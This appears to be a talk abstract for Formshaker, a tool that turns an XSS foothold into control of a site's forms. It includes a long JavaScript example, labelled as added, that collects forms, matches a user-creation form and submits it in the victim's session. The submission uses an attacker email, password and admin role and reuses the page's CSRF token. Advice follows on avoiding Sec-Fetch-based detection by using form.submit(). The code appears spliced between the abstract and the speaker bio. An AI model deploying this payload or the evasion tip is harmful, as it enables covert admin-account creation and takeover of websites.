Formshaker

Formshaker is a JavaScript library that runs in the victim's browser and acts as a proxy, bridging a website's functionality and the attacker. Its purpose is to maximize what an attacker can do once they have an XSS foothold. Formshaker is a project that a friend of mine and I initiated in 2018. It consists of a web application (the C&C) and a JS library, and the library operates in two modes: C&C-dependent and standalone.

Technically, the tool crawls the website in which the JS library is active, collects its HTML forms, and gives the attacker visibility into the forms that exist there. Through the C&C, the attacker can view, modify, and submit those forms via the JS library, within the context of the victim's session.

The standalone version, on the other hand, is self-contained: all the information needed to populate form inputs and to decide whether to submit a form with preconfigured data is embedded in the JS code. This mode operates independently and never contacts the C&C. An intriguing scenario arises when the JS agent is injected into the browser of a victim who holds admin privileges: the library identifies the user creation form, fills its inputs with predetermined values (such as the attacker's email and password), and creates the user.
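The form-collection and standalone-mode decision logic sketched above, as an added example that is not Formshaker's own code. The rule set, the field names (`username`, `email`, `password`, `role`, `_csrf`) and the sample admin page are all constructed for this example; the DOM-facing parts are duck-typed so the same functions run on that constructed input outside a browser.

```javascript
// Added example (not Formshaker's code): collect forms like a crawler would,
// match them against rules baked into the agent, and submit in the victim's
// session. Field names, rules and the sample page are hypothetical.

// Describe one form the way a crawler reports it to a C&C. `form` is an
// HTMLFormElement in a browser; only action, method and elements[] are read,
// so a plain object of the same shape works too.
function describeForm(form) {
  const fields = [];
  for (const el of form.elements) {
    if (!el.name) continue; // unnamed controls are never submitted
    fields.push({
      name: el.name,
      type: String(el.type || 'text').toLowerCase(),
      value: el.value == null ? '' : String(el.value),
      checked: !!el.checked,
    });
  }
  return {
    action: form.action || '',
    method: String(form.method || 'get').toUpperCase(),
    fields,
  };
}

// Standalone mode: rules shipped inside the agent. A rule matches a form that
// carries every field name in `requires`; the values are what gets submitted.
const RULES = [
  {
    name: 'create-admin-user',
    requires: ['username', 'email', 'password', 'role'],
    fill: {
      username: 'svc-backup',
      email: 'attacker@example.com',
      password: 'Example-Passw0rd!',
      role: 'admin',
    },
  },
];

function matchRule(desc, rules = RULES) {
  const names = new Set(desc.fields.map((f) => f.name));
  return rules.find((r) => r.requires.every((n) => names.has(n))) || null;
}

// Build the request body. Fields the rule fills are overwritten; everything
// else (hidden inputs such as the page's CSRF token, defaults the page set)
// is kept as rendered, because the agent runs inside the victim's session and
// the page's own token is exactly what the server expects. Buttons and file
// inputs are dropped; unchecked boxes/radios are not submitted.
function buildPayload(desc, rule) {
  const body = new URLSearchParams();
  for (const f of desc.fields) {
    if (f.type === 'submit' || f.type === 'button' || f.type === 'file') continue;
    const filled = Object.prototype.hasOwnProperty.call(rule.fill, f.name);
    if ((f.type === 'checkbox' || f.type === 'radio') && !f.checked && !filled) continue;
    body.append(f.name, filled ? rule.fill[f.name] : f.value);
  }
  return body;
}

// Submit with the victim's cookies: a same-origin fetch sends them by default.
function submitInSession(desc, body) {
  if (desc.method === 'GET') {
    const url = new URL(desc.action, location.href);
    url.search = body.toString();
    return fetch(url.toString(), { credentials: 'same-origin' });
  }
  return fetch(desc.action, {
    method: desc.method,
    credentials: 'same-origin',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: body.toString(),
  });
}

// Browser entry point: walk every form, fire the first matching rule, and
// return the decisions (what a C&C-dependent mode would report instead).
function runStandalone(doc, rules = RULES, send = submitInSession) {
  const decisions = [];
  for (const form of doc.forms) {
    const desc = describeForm(form);
    const rule = matchRule(desc, rules);
    decisions.push({ action: desc.action, rule: rule ? rule.name : null });
    if (rule) send(desc, buildPayload(desc, rule));
  }
  return decisions;
}

// Constructed sample: what the crawler would see on a hypothetical admin page.
const SAMPLE_DOC = {
  forms: [
    { action: '/search', method: 'get',
      elements: [{ name: 'q', type: 'search', value: '' }, { type: 'submit', value: 'Go' }] },
    { action: '/admin/users/new', method: 'post',
      elements: [
        { name: '_csrf', type: 'hidden', value: 'tok-123' },
        { name: 'username', type: 'text', value: '' },
        { name: 'email', type: 'email', value: '' },
        { name: 'password', type: 'password', value: '' },
        { name: 'role', type: 'select-one', value: 'viewer' },
        { name: 'notify', type: 'checkbox', value: '1', checked: false },
        { name: 'create', type: 'submit', value: 'Create user' },
      ] },
  ],
};

if (typeof document !== 'undefined') runStandalone(document);
```

Two points worth noting. The CSRF token is copied straight out of the rendered form, which is why anti-CSRF tokens do nothing against an in-session agent; only controls that demand something the page does not already hold (re-authentication or a second factor for privileged actions) change the outcome. On the detection side, a `fetch()` submission carries `Sec-Fetch-Mode: cors` and `Sec-Fetch-Dest: empty`, whereas a real form submission is a navigation (`navigate`/`document`), so a server that compares those headers can tell the two apart; an agent that instead calls `form.submit()` on the live element produces a genuine navigation and removes that signal.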

About the Speaker

Ricardo Martin Rodriguez is a passionate and analytical security professional with 8+ years of experience in penetration testing, vulnerability assessments, and security recommendations, possessing a deep understanding of Shift Left, DevSecOps, Security Champions, and SDL concepts.